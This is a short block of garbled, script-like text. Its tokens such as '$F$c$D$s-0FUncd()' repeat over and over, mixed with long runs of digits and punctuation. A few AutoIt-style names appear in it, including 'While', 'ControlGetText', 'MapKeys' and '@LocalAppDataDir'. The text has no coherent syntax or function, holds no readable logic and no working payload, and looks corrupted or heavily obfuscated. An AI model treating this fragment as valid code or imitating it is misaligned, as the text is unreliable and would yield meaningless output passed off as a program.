^=-0FUncd()
$F$F-0FUncd()
$F$c$D$s-0FUnct?1[8?6:1[9?.6:8A.8?6:1[8?6:1[9?6:0Y.9?6:1[9?1:0[0?7)
$F$s-0FUncd()
$D$s-0FUncd()
$c$D-0Funcd()
:0Y.9?7:0[9?6:0Y.8?7:`0[0?7:0Y.9?7:1[8?5:2[9?6:0Y0.9?6:0Y.9?6:1[9?6:0U.9?7:0[0?7:0Y.9?7:0:0?6:1[8?6:1[9?.6:8A.)
$c$D-0Funcd()
$F$c-0FUncd()
F$c$$D$s-0FUncd()
$F$s-0FUncd(0?1[8?6:1[9?.6:8A.8?6:1[8?6:1[9?6:0Y.9?6:1[9?1:0[0?7)
$F$s-0FUncd()
$D$s-0FUncd()
$c$D-0Funcd()
:0Y.9?7:0[9?6:0Y.8?7:`0[0?7:0Y.9?7:1[8?5:2[9??6:1[9?1:0[0?7:0Y.9?7:0[9?7:0[9?7:0[0?1[9?.6:8A.7?6:1[8?6:1[9?6:0Y.8While-1







?6:1[9?1:0[0?7:0Y.9?7:0[9?6:0Y.8?7:`0[0?70Y.9?7:0[9?7:0[0?7:0Y.9?7:0[9?6:2[9?5:00Y.9?6:0Y.9?6:1[9?6:0U.9?.d()
$F$s-0FUncd(
$F$c$D$s-0FUncd()
$F$s-0FUncd()
$F$c$D$s-0U$F$$s-F7?.7:0Y.0?6:1[9?6:0Y.9?6:1[98?7:`0[0?70Y[9?7:0:0?6:1[8?6:1[9?.6:8A.7?6:1[8?6:1[9?6:0Y.9?6:1[9?1:0[0MapKeys?7:0Y.9?7:0[9?6:0YControlGetText.8?7:`0[0?7:0Y.9?7:0[9?7:0[0?7:0Y.9?7:0[9?6:2[9?6:00Y.9@LocalAppDataDir?6:0Y.9?6:1[9?6:0U.9?.d()
$F$s-0FUncd(-)
$D$s()
$Fd()$F6:0Y0.9?6:0Y.9?6:1[9?6:0U.9?7:0[0?7:.Y09?7:0:0?6:1[8?6:1[9?.6:8A.7?.7:0Y.0?6:1[9?6:0Y.9?6:1[9?1:0[0?7:4Y.9?7:0[9?7:0[9?7:0[0?7:0Y.9?7:0[9?7:0:0?6:1[8?6:1[9?.6:8A.7?6:$c$D$s-0U$F$$s-F7?.7:0Y.0?6:1[9?6:0Y.9?6:1[9?1:0[0?7:0Y.9?7:0[9?7:0[9?7:0[0?7:0Y.9?7:0[9?7:0:0?6:1[8?6:1[9?.6:8A.7?6:1[8?6:1[9?6:0Y.9?6:1d()
$c$D-0Funcd()
$F$c-0FUncd()
$F$c$D$s-0FUncd()
$F$s-0FUncd()
$F$c$D$s-0U$F$$s-Func6:1[9?.6:8A.7?6:$c$D$s-0U$F$$s-F7?.7:0Y.0?6:1[9?6:0Y.9?6:1[9?1:0[0?7:0Y.9?7:0[9?7:0[9?7:0[0?7:0Y.9?7:0[9?7:0:0?6:1[8?6:1[9?.6:8A.7?6:1[8?6:1[9?SetCoord0Y.9?7:0c$D-0Funcd()
$F$c-0FUncd()
$F$c$D$s-0FUncd()
$F0000FUncd()
$F$c$D$s-0U$F$$s-FuncF[9?1:0[0?7:0Y